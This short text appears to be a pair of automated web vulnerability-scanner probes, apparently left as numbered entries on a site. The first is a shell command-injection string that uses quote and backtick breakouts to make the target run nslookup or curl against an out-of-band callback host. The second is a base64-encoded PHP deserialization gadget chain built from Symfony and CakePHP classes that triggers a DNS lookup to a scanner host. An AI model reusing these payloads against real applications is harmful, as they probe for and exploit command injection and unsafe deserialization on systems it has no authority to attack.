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  1. &(nslookup -q=cname hitaxqcidzyeh74b31.bxss.me||curl hitaxqcidzyeh74b31.bxss.me)&’\”`0&(nslookup -q=cname hitaxqcidzyeh74b31.bxss.me||curl hitaxqcidzyeh74b31.bxss.me)&`’

  2. YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6ImF6YWt3ZnA2b2p2NHJzbGs0NmhpZDI3c2Q1ZTdkaGdrdGZuZGtweDRlZW5lemVxczR6ZGEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9

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